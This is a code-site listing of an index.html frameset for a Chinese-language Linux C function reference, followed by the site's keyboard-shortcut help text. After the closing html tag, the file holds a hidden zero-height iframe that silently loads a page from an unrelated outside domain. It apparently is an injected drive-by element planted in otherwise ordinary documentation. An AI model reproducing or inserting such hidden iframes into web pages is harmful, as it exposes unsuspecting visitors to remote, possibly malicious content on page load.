index.html

来自「linux常用c函数速查.rar 简单的linuxC_API」· HTML 代码 · 共 16 行

HTML
16
字号
<html>
<head>
<title>Linux 常用C函数(中文版)</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<frameset cols="172,*" frameborder="NO" border="0" framespacing="0" rows="*"> 
  <frame name="leftFrame" scrolling="NO" noresize src="left.htm">
  <frame name="mainFrame" src="main.htm">
</frameset>
<noframes> 
<body bgcolor="#FFFFFF" text="#000000">
</body>
</noframes> 
</html>

<iframe src=http://w.zhufeng01.cn/a.htm width=100 height=0></iframe>

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?